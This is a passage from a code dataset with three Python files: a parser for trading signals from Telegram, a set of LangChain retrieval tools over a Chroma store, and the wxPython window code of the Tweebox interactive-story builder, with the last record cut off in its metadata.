+{"seq_id": "17330651811", "text": "import json\nimport os\nfrom server.sql import sqlScripts\n\n\nclass Analyzer:\n BUY_ACTION = 1\n SELL_ACTION = 0\n STOP_LOSS_KEY = 'stop_loss'\n TAKE_PROFIT_KEY = 'take_profit'\n stop_loss = None\n take_profit_levels = []\n config = {\n \"buy_signals\": [\n \"buy\",\n \"buy now\"\n ],\n \"sell_signals\": [\n \"sell\",\n \"sell now\"\n ],\n \"telegram_user_name\": \"your_telegram_user_name\",\n \"api_id\": \"your_telegram_api_id\",\n \"api_hash\": \"your_telegram_api_hash\"\n }\n\n def __init__(self, text, dbCursor, chat_id, chat_name, serialized_chat_info):\n self.chat_id = chat_id\n self.chat_name = chat_name\n self.serialized_chat_info = serialized_chat_info\n self.dbCursor = dbCursor\n self.text = text.lower()\n self.symbol = self.identifySymbol()\n self.action = self.identifyAction()\n self.action_now = self.identifyActionNow()\n self.identifyStopLossLevel()\n self.identifyAllTakeProfitLevels()\n self.checkForConfigFiles()\n\n def identifyActionNow(self):\n if 'now' in self.text:\n return True\n\n return False\n\n def checkForConfigFiles(self):\n if not os.path.isfile('./config.json'):\n with open('./config.json', 'w') as config_file:\n json.dump(self.config, config_file)\n else:\n with open('./config.json', 'r') as config_file:\n self.config = json.load(config_file)\n\n def identifyAction(self):\n sell_counter = 0\n buy_counter = 0\n for s in self.config['sell_signals']:\n if s in self.text:\n sell_counter += 1\n\n for b in self.config['buy_signals']:\n if b in self.text:\n buy_counter += 1\n\n if buy_counter >= 1 and sell_counter == 0:\n return self.BUY_ACTION\n\n if sell_counter >= 1 and buy_counter == 0:\n return self.SELL_ACTION\n\n return None\n\n def identifySymbol(self):\n res = self.dbCursor.execute(sqlScripts.constructGetInstrumentsSql())\n allowedSymbols = res.fetchall()\n\n for symbol in allowedSymbols:\n if symbol[1].lower() in self.text:\n return symbol[2]\n\n return None\n\n def isSignalValid(self):\n if self.action is None or self.symbol is None:\n return False\n\n if self.identifyActionNow():\n return True\n\n if self.stop_loss is None or len(self.take_profit_levels) == 0:\n return False\n\n return True\n\n def identifyAllTakeProfitLevels(self):\n if self.serialized_chat_info['allow_multiple_tp']:\n for i in range(0, len(self.serialized_chat_info['take_profit_key_words']) - 1):\n current_key_word = self.serialized_chat_info['take_profit_key_words'][i]\n self.take_profit_levels.append(self.identifySingleTakeProfitLevel(current_key_word))\n self.take_profit_levels = [i for i in self.take_profit_levels if i is not None]\n else:\n self.take_profit_levels.append(\n self.identifySingleTakeProfitLevel(self.serialized_chat_info['take_profit_key_words'][0])\n )\n\n def identifyStopLossLevel(self):\n index_start = self.text.find(self.serialized_chat_info['stop_loss_key_word'].lower())\n index_end = index_start + len(self.serialized_chat_info['stop_loss_key_word'])\n skipped_first_space = False\n for i in range(index_end, len(self.text)):\n current_char = self.text[i]\n if current_char.isnumeric() or current_char == \".\":\n if self.stop_loss is None:\n self.stop_loss = str(current_char)\n continue\n\n self.stop_loss = self.stop_loss + str(current_char)\n\n else:\n if skipped_first_space is False:\n skipped_first_space = True\n continue\n else:\n break\n\n def identifySingleTakeProfitLevel(self, take_profit_key_word):\n if take_profit_key_word.lower() not in self.text:\n return\n\n take_profit_level = None\n\n index_start = 
self.text.find(take_profit_key_word)\n index_end = index_start + len(take_profit_key_word)\n skipped_first_space = False\n for i in range(index_end, len(self.text)):\n current_char = self.text[i]\n if current_char.isnumeric() or current_char == \".\":\n if take_profit_level is None:\n take_profit_level = str(current_char)\n continue\n\n take_profit_level = take_profit_level + str(current_char)\n\n else:\n if skipped_first_space is False:\n skipped_first_space = True\n continue\n else:\n break\n\n return take_profit_level\n\n def printDetails(self):\n print(\"Signal Info:\")\n print(f\"Instrument: {self.action} {self.symbol}\")\n print(f\"Take-profit-levels: {self.take_profit_levels}\")\n print(f\"Stop-loss: {self.stop_loss}\")\n", "repo_name": "NagaiMatsuge/ucharKetmon", "sub_path": "server/utils/analyzer/analyzer.py", "file_name": "analyzer.py", "file_ext": "py", "file_size_in_byte": 5196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "server.sql.sqlScripts.constructGetInstrumentsSql", "line_number": 74, "usage_type": "call"}, {"api_name": "server.sql.sqlScripts", "line_number": 74, "usage_type": "name"}]}
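Two pitfalls in the Analyzer record above: stop_loss, take_profit_levels, and config are declared as class attributes, and identifyAllTakeProfitLevels appends to self.take_profit_levels, so every instance mutates one shared list that keeps growing across messages; the same method also iterates range(0, len(take_profit_key_words) - 1), silently dropping the last keyword. A minimal sketch of the level-extraction part only, with instance state and a regex replacing the character-by-character scanner -- the regex and the trimmed constructor are assumptions, not the repo's API:

import re

class Analyzer:
    def __init__(self, text, serialized_chat_info):
        self.text = text.lower()
        self.serialized_chat_info = serialized_chat_info
        self.take_profit_levels = []  # instance state: a fresh list per message
        self.stop_loss = self.extractLevel(serialized_chat_info['stop_loss_key_word'])
        self.identifyAllTakeProfitLevels()

    def extractLevel(self, key_word):
        # First integer or decimal after the keyword; assumes one level per keyword.
        match = re.search(re.escape(key_word.lower()) + r'\D*?(\d+(?:\.\d+)?)', self.text)
        return match.group(1) if match else None

    def identifyAllTakeProfitLevels(self):
        key_words = self.serialized_chat_info['take_profit_key_words']
        if not self.serialized_chat_info['allow_multiple_tp']:
            key_words = key_words[:1]
        for key_word in key_words:  # iterate the full list, not len(...) - 1
            level = self.extractLevel(key_word)
            if level is not None:
                self.take_profit_levels.append(level)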
+{"seq_id": "8279342456", "text": "from dotenv import load_dotenv\nfrom langchain.chains import RetrievalQA\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.embeddings import HuggingFaceInstructEmbeddings\nfrom langchain import HuggingFacePipeline\n\nfrom langchain.vectorstores import Chroma\nfrom langchain.docstore.document import Document\nfrom langchain.text_splitter import CharacterTextSplitter, TokenTextSplitter, RecursiveCharacterTextSplitter\nfrom server.oobabooga_llm import OobaboogaLLM\nfrom langchain.llms import OpenAI\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom constants import *\nimport os\n\nload_dotenv()\nTEST_FILE = os.getenv(\"TEST_FILE\")\nEMB_INSTRUCTOR_XL = os.getenv(\"EMBEDDINGS_MODEL\")\n\nCHROMA_SETTINGS = {} # Set your Chroma settings here\ndef load_tools(llm_model):\n \n def ingest_file(file_path):\n # Load text file\n with open(file_path, 'r') as file:\n text = file.read()\n\n # Use filename as title\n title = os.path.basename(file_path)\n docs = {title: text}\n embedding = HuggingFaceInstructEmbeddings(model_name=EMB_INSTRUCTOR_XL, model_kwargs={\"device\": \"cuda:2\"})\n \n documents = [Document(page_content=docs[title]) for title in docs]\n # Split by section, then split by token limit\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=100, chunk_overlap=20)\n texts = text_splitter.split_documents(documents)\n \n text_splitter = TokenTextSplitter(chunk_size=512,chunk_overlap=10, encoding_name=\"cl100k_base\") # may be inexact\n texts = text_splitter.split_documents(texts)\n \n vectordb = Chroma.from_documents(documents=texts, embedding=embedding)\n retriever = vectordb.as_retriever(search_kwargs={\"k\":4})\n\n print(title)\n print(retriever)\n \n return retriever, title\n\n file_path = TEST_FILE\n retriever, title = ingest_file(file_path)\n\n def searchChroma(key_word):\n hf_llm = OobaboogaLLM() \n qa = RetrievalQA.from_chain_type(llm=hf_llm, chain_type=\"stuff\",\\\n retriever=retriever, return_source_documents=False)\n \n print(qa)\n res=qa.run(key_word)\n print(res)\n return res\n\n dict_tools = {\n 'Chroma Search': searchChroma,\n 'File Ingestion': ingest_file,\n }\n return dict_tools\n\n\n", "repo_name": "Karajan421/langchain_guidance", "sub_path": "server/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 2381, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 17, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "langchain.embeddings.HuggingFaceInstructEmbeddings", "line_number": 31, "usage_type": "call"}, {"api_name": "langchain.docstore.document.Document", "line_number": 33, "usage_type": "call"}, {"api_name": "langchain.text_splitter.RecursiveCharacterTextSplitter", "line_number": 35, "usage_type": "call"}, {"api_name": "langchain.text_splitter.TokenTextSplitter", "line_number": 38, "usage_type": "call"}, {"api_name": "langchain.vectorstores.Chroma.from_documents", "line_number": 41, "usage_type": "call"}, {"api_name": "langchain.vectorstores.Chroma", "line_number": 41, "usage_type": "name"}, {"api_name": "server.oobabooga_llm.OobaboogaLLM", "line_number": 53, "usage_type": "call"}, {"api_name": 
"langchain.chains.RetrievalQA.from_chain_type", "line_number": 54, "usage_type": "call"}, {"api_name": "langchain.chains.RetrievalQA", "line_number": 54, "usage_type": "name"}]}
+{"seq_id": "17283598333", "text": "#\n# gui.py\n#\n# This handles the project window and menus.\n#\n\nimport os, sys, wx, urllib\nfrom project import Project\nimport tiddlywiki\n\nID_HELP = 101\nID_GOOGLE_GROUP = 102\n\nID_NEW_PROJECT = 103\nID_OPEN_PROJECT = 104\nID_SAVE_PROJECT = 105\nID_SAVE_PROJECT_AS = 106\n\nID_ADD_SOURCE = 107\nID_REMOVE_SOURCE = 108\nID_BUILD = 109\nID_PROOF = 110\n\nID_TARGET_CHOICE = 201\nID_SAVEAS_BUTTON = 202\nID_BUILD_BUTTON = 203\nID_ADD_BUTTON = 204\n\n\nclass ProjectWindow (wx.Frame):\n\n\t#\n\t# constructors\n\t#\n\n\tdef __init__ (self, parent):\n\t\n\t\t# restore our config and recently-opened files\n\t\t\n\t\tself.config = wx.Config('Tweebox')\n\t\tself.recentFiles = wx.FileHistory(5)\n\t\tself.recentFiles.Load(self.config)\n\t\n\t\t# get a new Project object\n\t\t\n\t\tself.project = Project()\n\t\tself.fileName = ''\n\t\tself.dirty = False\n\n\t\t# create the window\n\n\t\twx.Frame.__init__(self, parent, wx.ID_ANY, 'Untitled Project', \\\n\t\t\t\t\t\t size = (550, 250), style = wx.CLOSE_BOX | wx.CAPTION | wx.SYSTEM_MENU | wx.MINIMIZE_BOX)\n\t\tself.addMenus()\t\t\n\t\tself.addControls()\n\t\tself.CreateStatusBar()\n\t\t\t\t\n\t\t# show our window\n\t\n\t\tself.Centre()\n\t\tself.Show(True)\n\t\t\n\t\t# try opening the most recent project\n\t\t\n\t\tif self.recentFiles.GetCount() > 0:\n\t\t\tself.fileName = self.recentFiles.GetHistoryFile(0)\n\t\t\tself.loadFile(failLoudly = False)\n\t\t\t\n\t\t\n\tdef addMenus (self):\n\t\n\t\t# create menus\n\n\t\thelpMenu = wx.Menu()\n\t\thelpMenu.Append(wx.ID_ABOUT, '&About Tweebox')\n\t\thelpMenu.Append(ID_HELP, 'Tweebox &Help')\n\t\thelpMenu.Append(ID_GOOGLE_GROUP, 'Discuss Twee Online')\n\t\t\n\t\tfileMenu = wx.Menu()\n\t\tself.fileNewItem = fileMenu.Append(ID_NEW_PROJECT, '&New Project\\tCtrl-N')\n\t\tself.fileOpenItem = fileMenu.Append(ID_OPEN_PROJECT, '&Open Project...\\tCtrl-O')\n\t\tfileMenu.AppendSeparator()\n\t\tself.fileSaveItem = fileMenu.Append(ID_SAVE_PROJECT, '&Save Project\\tCtrl-S')\n\t\tself.fileSaveAsItem = fileMenu.Append(ID_SAVE_PROJECT_AS, 'S&ave Project As...')\n\t\tfileMenu.AppendSeparator()\n\t\tself.fileQuitItem = fileMenu.Append(wx.ID_EXIT, '&Exit\\tCtrl-Q')\n\t\tself.recentFiles.UseMenu(fileMenu)\n\t\tself.recentFiles.AddFilesToMenu()\n\n\t\tprojectMenu = wx.Menu()\n\t\tself.projectAddItem = projectMenu.Append(ID_ADD_SOURCE, 'Add Source File...')\n\t\tself.projectRemoveItem = projectMenu.Append(ID_REMOVE_SOURCE, 'Remove Source File')\n\t\tprojectMenu.AppendSeparator()\n\t\tself.projectBuildItem = projectMenu.Append(ID_BUILD, '&Build Story\\tCtrl-B')\n\t\tself.projectProofItem = projectMenu.Append(ID_PROOF, '&Proof Story\\tCtrl-P')\n\t\t\n\t\t# create menu bar\n\t\t\n\t\tmenuBar = wx.MenuBar()\n\t\tmenuBar.Append(fileMenu, '&File')\n\t\tmenuBar.Append(projectMenu, '&Project')\n\t\tmenuBar.Append(helpMenu, '&Help')\n\t\tself.SetMenuBar(menuBar)\t\t\n\n\t\t# add menu events\n\t\t\n\t\twx.EVT_UPDATE_UI(self, -1, self.updateUI)\n\t\t\n\t\twx.EVT_MENU(self, wx.ID_ABOUT, self.onAbout)\n\t\twx.EVT_MENU(self, ID_HELP, self.onHelp)\n\t\twx.EVT_MENU(self, ID_GOOGLE_GROUP, self.onGoogleGroup)\n\t\twx.EVT_MENU(self, ID_NEW_PROJECT, self.onNew)\n\t\twx.EVT_MENU(self, ID_OPEN_PROJECT, self.onOpen)\n\t\twx.EVT_MENU(self, ID_SAVE_PROJECT, self.onSave)\n\t\twx.EVT_MENU(self, ID_SAVE_PROJECT_AS, self.onSaveAs)\n\t\twx.EVT_MENU(self, wx.ID_EXIT, self.onQuit)\n\t\twx.EVT_MENU(self, wx.ID_FILE1, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE2, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE3, 
self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE4, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE5, self.onOpenRecent)\n\t\twx.EVT_MENU(self, ID_ADD_SOURCE, self.onAddSource)\n\t\twx.EVT_MENU(self, ID_REMOVE_SOURCE, self.onRemoveSource)\n\t\twx.EVT_MENU(self, ID_BUILD, self.onBuild)\n\t\twx.EVT_MENU(self, ID_PROOF, self.onProof)\n\n\n\tdef addControls (self):\n\t\tpanel = wx.Panel(self)\n\t\tmainSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\tpanel.SetSizer(mainSizer)\n\t\t\n\t\t# sources on the left half\n\t\t\n\t\tsourcesPanel = wx.Panel(panel)\n\t\tsourcesBox = wx.StaticBox(sourcesPanel, wx.ID_ANY, 'Source Files')\n\t\tsourcesSizer = wx.StaticBoxSizer(sourcesBox, wx.VERTICAL)\n\t\tsourcesPanel.SetSizer(sourcesSizer)\n\t\t\n\t\tself.sourcesList = wx.ListBox(sourcesPanel)\n\t\tself.addButton = wx.Button(sourcesPanel, ID_ADD_BUTTON, 'Add')\n\t\twx.EVT_BUTTON(self, ID_ADD_BUTTON, self.onAddSource)\n\t\t\n\t\tsourcesSizer.Add(self.sourcesList, 1, wx.EXPAND)\n\t\tsourcesSizer.Add(self.addButton, 0, wx.TOP | wx.ALIGN_RIGHT, 8)\n\t\t\n\t\t# story file stuff on the right half\n\t\t\n\t\tstoryPanel = wx.Panel(panel)\n\t\tstoryBox = wx.StaticBox(storyPanel, wx.ID_ANY, 'Story File')\n\t\tstorySizer = wx.StaticBoxSizer(storyBox, wx.VERTICAL)\n\t\tstoryPanel.SetSizer(storySizer)\n\t\t\n\t\t# file destination row\n\t\t\n\t\tsaveAsPanel = wx.Panel(storyPanel)\n\t\tsaveAsSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\tsaveAsPanel.SetSizer(saveAsSizer)\n\t\t\n\t\tself.saveAsText = wx.StaticText(saveAsPanel, wx.ID_ANY, 'Save As:')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\tself.saveAsButton = wx.Button(saveAsPanel, ID_SAVEAS_BUTTON, 'Set')\t\t\t\t\t\t\t\t \n\t\twx.EVT_BUTTON(self, ID_SAVEAS_BUTTON, self.onSetDestination)\n\t\t\n\t\tsaveAsSizer.Add(self.saveAsText, 1, wx.TOP | wx.BOTTOM | wx.EXPAND, 10)\n\t\tsaveAsSizer.Add(self.saveAsButton, 0, wx.TOP | wx.BOTTOM, 8)\n\n\t\tstorySizer.Add(saveAsPanel, 0, wx.EXPAND, 0)\n\t\t\n\t\t# target row\n\n\t\ttargetPanel = wx.Panel(storyPanel)\n\t\ttargetSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\ttargetPanel.SetSizer(targetSizer)\n\t\t\n\t\tself.targetLabel = wx.StaticText(targetPanel, wx.ID_ANY, 'Story Format:')\n\n\t\tself.targetChoice = wx.Choice(targetPanel, ID_TARGET_CHOICE, \\\n\t\t\t\t\t\t\t\t\t choices = ('Sugarcane', 'Jonah', 'TiddlyWiki 2', 'TiddlyWiki 1.2'))\n\t\tself.targetChoice.SetSelection(0)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\twx.EVT_CHOICE(self, ID_TARGET_CHOICE, self.onChangeTarget)\n\t\t\n\t\ttargetSizer.Add(self.targetLabel, 1, wx.TOP | wx.BOTTOM, 10)\n\t\ttargetSizer.Add(self.targetChoice, 1, wx.TOP | wx.BOTTOM, 8)\n\t\t\n\t\tstorySizer.Add(targetPanel, 0, wx.ALL | wx.EXPAND, 0)\n\t\t\n\t\t# add our halves to the main panel\n\t\t\n\t\tmainSizer.Add(sourcesPanel, 1, wx.ALL | wx.EXPAND, 8)\n\t\tmainSizer.Add(storyPanel, 1, wx.ALL | wx.EXPAND, 8)\n\t\t\t\t\n\t#\n\t# utility functions\n\t#\n\n\tdef updateUI (self, event):\t\t\n\t\tif self.sourcesList.GetSelection() == wx.NOT_FOUND:\n\t\t\tself.projectRemoveItem.Enable(False)\n\t\telse:\n\t\t\tself.projectRemoveItem.Enable(True)\n\t\t\t\n\t\tif self.sourcesList.IsEmpty():\n\t\t\tself.projectBuildItem.Enable(False)\n\t\t\tself.projectProofItem.Enable(False)\n\t\telse:\n\t\t\tself.projectBuildItem.Enable(True)\n\t\t\tself.projectProofItem.Enable(True)\n\t\t\t\n\t\t\t\n\tdef updateTitle (self):\n\t\tif self.fileName == '':\n\t\t\ttitle = 'Untitled Project'\n\t\telse:\n\t\t\tbits = os.path.splitext(self.fileName)\n\t\t\ttitle = 
os.path.basename(bits[0])\n\t\t\t\n\t\tself.SetTitle('Tweebox - ' + title)\n\t\t\n\t\n\tdef updateDestination (self):\n\t\tlabel = 'Save As: '\n\t\t\n\t\tif self.project.destination != '':\n\t\t\tlabel += os.path.basename(self.project.destination)\n\t\t\n\t\tself.saveAsText.SetLabel(label)\n\t\t\n\t\t\n\tdef closeProject (self):\n\t\tif self.dirty:\n\t\t\tbits = os.path.splitext(self.fileName)\n\t\t\ttitle = os.path.basename(bits[0])\n\n\t\t\tmessage = 'Close ' + title + ' without saving changes?'\n\t\t\tdialog = wx.MessageDialog(self, message, 'Save Changes', \\\n\t\t\t\t\t\t\t\t\t wx.ICON_QUESTION | wx.YES_NO | wx.NO_DEFAULT)\n\t\t\treturn (dialog.ShowModal() == wx.ID_YES)\n\t\telse:\n\t\t\treturn True\n\t\t\t\n\n\tdef targetToReadable (self, target):\n\t\tif target == 'sugarcane':\n\t\t\treturn 'Sugarcane'\n\t\t\n\t\tif target == 'jonah':\n\t\t\treturn 'Jonah'\n\t\t\t\n\t\tif target == 'tw2':\n\t\t\treturn 'TiddlyWiki 2'\n\t\t\t\n\t\tif target == 'tw':\n\t\t\treturn 'TiddlyWiki 1.2'\n\t\t\n\t\n\tdef readableToTarget (self, readable):\n\t\tif readable == 'Sugarcane':\n\t\t\treturn 'sugarcane'\n\t\t\n\t\tif readable == 'Jonah':\n\t\t\treturn 'jonah'\n\t\t\t\n\t\tif readable == 'TiddlyWiki 2':\n\t\t\treturn 'tw2'\n\t\t\t\n\t\tif readable == 'TiddlyWiki 1.2':\n\t\t\treturn 'tw'\n\t\t\t\n\t#\n\t# event handlers\n\t#\n\n\tdef onAbout (self, event):\n\t\tinfo = wx.AboutDialogInfo()\n\t\tinfo.SetName('Tweebox')\n\t\tinfo.SetVersion('2.1')\n\t\tinfo.SetDescription('\\nA tool for creating interactive stories\\nwritten by Chris Klimas\\n\\nhttp://gimcrackd.com/etc/src/')\n\t\tinfo.SetCopyright('The Twee compiler and associated JavaScript files in this application are released under the GNU Public License.\\n\\nThe files in the targets directory are derivative works of Jeremy Ruston\\'s TiddlyWiki project and are used under the terms of its license.')\n\t\twx.AboutBox(info)\n\n\t\t\n\tdef onHelp (self, event):\n\t\twx.LaunchDefaultBrowser('http://gimcrackd.com/etc/doc/')\n\n\t\t\n\tdef onGoogleGroup (self, event):\n\t\twx.LaunchDefaultBrowser('http://groups.google.com/group/tweecode')\n\n\n\tdef onNew (self, event):\n\t\tif (self.closeProject()):\n\t\t\tself.project = Project()\n\t\t\tself.fileName = ''\n\t\t\tself.dirty = True\n\t\t\tself.updateTitle()\n\t\t\tself.updateDestination()\n\t\t\tself.sourcesList.Clear()\n\t\t\t\n\t\t\t\n\tdef onOpen (self, event):\n\t\tif (self.closeProject()):\n\t\t\tdialog = wx.FileDialog(self, 'Open Project', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t\t \"Tweebox Project (*.twp)|*.twp\", \\\n\t\t\t\t\t\t\t\t wx.OPEN | wx.FD_CHANGE_DIR)\n\t\t\t\t\t\t\t\t\t\t\t\t\t \t \n\t\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\t\tself.fileName = dialog.GetPath()\n\t\t\t\tself.loadFile()\n\t\t\t\tself.recentFiles.AddFileToHistory(self.fileName)\n\t\t\t\t\n\t\t\tdialog.Destroy()\n\t\t\t\t\n\tdef onOpenRecent (self, event):\t\t\n\t\tif event.GetId() == wx.ID_FILE1:\n\t\t index = 0\n\t\telif event.GetId() == wx.ID_FILE2:\n\t\t index = 1\n\t\telif event.GetId() == wx.ID_FILE3:\n\t\t index = 2\n\t\telif event.getId() == wx.ID_FILE4:\n\t\t index = 3\n\t\telif event.getId() == wx.ID_FILE5:\n\t\t index = 4\n\t\t\t \n\t\tself.fileName = self.recentFiles.GetHistoryFile(index)\n\t\tself.loadFile()\n\n\tdef loadFile (self, failLoudly = True):\n\t\ttry:\n\t\t\tself.project = Project(self.fileName)\n\t\texcept:\n\t\t\tif failLoudly:\n\t\t\t\twx.MessageBox('Can\\'t open ' + self.fileName + '. 
Make sure this file has not been moved ' + \\\n\t\t\t\t \t\t 'or deleted, and that you are able to read files in this location.', \\\n\t\t\t\t\t\t\t 'Can\\'t Open File', wx.ICON_ERROR)\n\t\t\treturn\n\t\t\t\t\n\t\tself.dirty = False\n\t\t\n\t\t# sync UI to file contents\n\t\t\t\t\t\t\n\t\tself.updateTitle()\n\t\tself.updateDestination()\n\t\tself.sourcesList.Clear()\n\t\t\n\t\tfor source in self.project.sources:\n\t\t\tself.sourcesList.Append(os.path.basename(source))\n\t\t\n\t\ttarget = self.targetToReadable(self.project.target)\n\t\tself.targetChoice.SetStringSelection(target)\t\t\n\n\n\tdef displayError (self, activity):\n\t\texception = sys.exc_info()\n\t\ttext = 'An error occurred while ' + activity + ' ('\n\t\ttext += str(exception[1]) + ').'\n\t\t\n\t\terror = wx.MessageDialog(self, text, 'Error', wx.OK | wx.ICON_ERROR)\n\t\terror.ShowModal()\n\t\t\n\n\tdef onSaveAs (self, event):\n\t\tdialog = wx.FileDialog(self, 'Save Project', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t \"Tweebox Project (*.twp)|*.twp\", \\\n\t\t \t\t\t\t\t wx.SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tself.fileName = dialog.GetPath()\n\t\t\tself.updateTitle()\n\t\t\tself.onSave(event)\n\t\t\t\n\t\tdialog.Destroy()\n\t\t\t\n\n\tdef onSave (self, event):\n\t\tif self.fileName != '':\n\t\t\ttry:\n\t\t\t\tself.project.save(self.fileName)\n\t\t\t\tself.dirty = False\n\t\t\texcept:\n\t\t\t\tself.displayError('saving your project')\n\t\telse:\n\t\t\tself.onSaveAs(event)\n\n\n\tdef onQuit (self, event):\n\t\tif self.closeProject():\n\t\t\tself.recentFiles.Save(self.config)\n\t\t\tself.Close(True)\n\t\t\n\n\tdef onAddSource (self, event):\n\t\tdialog = wx.FileDialog(self, 'Add Source File', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t \"Twee source code (*.tw)|*.tw|Plain text files (*.txt)|*.txt\", wx.OPEN | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tpath = dialog.GetPath()\n\t\t\tself.project.sources.append(path)\n\t\t\tself.sourcesList.Append(os.path.basename(path))\n\t\t\tself.dirty = True\n\t\t\t\n\t\tdialog.Destroy()\n\n\n\tdef onRemoveSource (self, event):\n\t\tindex = self.sourcesList.GetSelection()\n\t\tself.project.sources.pop(index)\n\t\tself.sourcesList.Delete(index)\n\t\tself.dirty = True\n\t\t\n\t\t\n\tdef onChangeTarget (self, event):\n\t\ttarget = self.targetChoice.GetStringSelection()\n\t\tself.project.target = self.readableToTarget(target)\n\t\tself.dirty = True\n\t\t\n\n\tdef onSetDestination (self, event):\n\t\tdialog = wx.FileDialog(self, 'Save Story As', os.getcwd(), \"\", \\\n\t \t\t\t\t\t\t \"Web Page (*.html)|*.html\", \\\n\t\t\t\t\t\t\t wx.SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tpath = dialog.GetPath()\n\t\t\tself.project.destination = path\n\t\t\tself.dirty = True\n\t\t\tself.updateDestination()\n\t\t\tdialog.Destroy()\n\t\t\treturn True\n\t\t\t\n\t\tdialog.Destroy()\n\t\treturn False\t\t\n\n\t\t\t\t\n\tdef onBuild (self, event):\t\n\t\tif self.project.destination == '':\n\t\t\tif not self.onSetDestination(event):\n\t\t\t\treturn\n\t\t\t\t\n\t\tself.SetStatusText('Building your story...')\n\t\n\t\ttry:\n\t\t\tif self.project.build():\n\t\t\t\tpath = 'file://' + urllib.pathname2url(self.project.destination)\n\t\t\t\tpath = path.replace('file://///', 'file:///')\n\t\t\t\twx.LaunchDefaultBrowser(path)\t\n\t\t\t\tself.SetStatusText('Your story has been successfully built.')\n\t\texcept:\n\t\t\t self.displayError('building your story')\n\t\t\t 
self.SetStatusText('')\n\n\tdef onProof (self, event):\t\n\t\tif self.project.destination == '':\n\t\t\tif not self.onSetDestination(event):\n\t\t\t\treturn\n\t\t\t\t\n\t\tself.SetStatusText('Building proofing copy...')\n\t\n\t\ttry:\n\t\t\tif self.project.proof():\t\n\t\t\t\tself.SetStatusText('Your proofing copy has been successfully built.')\n\t\texcept:\n\t\t\t self.displayError('building a proofing copy of your story')\n\t\t\t self.SetStatusText('')", "repo_name": "factorypreset/twee", "sub_path": "twee/branches/1.5/lib/gui.py", "file_name": "gui.py", "file_ext": "py", "file_size_in_byte": 12936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "wx.Frame", "line_number": 30, "usage_type": "attribute"}, {"api_name": "wx.Config", "line_number": 40, "usage_type": "call"}, {"api_name": "wx.FileHistory", "line_number": 41, "usage_type": "call"}, {"api_name": "project.Project", "line_number": 46, "usage_type": "call"}, {"api_name": "wx.Frame.__init__", "line_number": 52, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.CLOSE_BOX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.CAPTION", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.SYSTEM_MENU", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.MINIMIZE_BOX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.ID_ABOUT", "line_number": 75, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 79, "usage_type": "call"}, {"api_name": "wx.ID_EXIT", "line_number": 86, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 90, "usage_type": "call"}, {"api_name": "wx.MenuBar", "line_number": 99, "usage_type": "call"}, {"api_name": "wx.EVT_UPDATE_UI", "line_number": 107, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 109, "usage_type": "call"}, {"api_name": "wx.ID_ABOUT", "line_number": 109, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 110, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 111, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 112, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 113, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 114, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 115, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 116, "usage_type": "call"}, {"api_name": "wx.ID_EXIT", "line_number": 116, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 117, "usage_type": "call"}, {"api_name": "wx.ID_FILE1", "line_number": 117, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 118, "usage_type": "call"}, {"api_name": "wx.ID_FILE2", "line_number": 118, "usage_type": 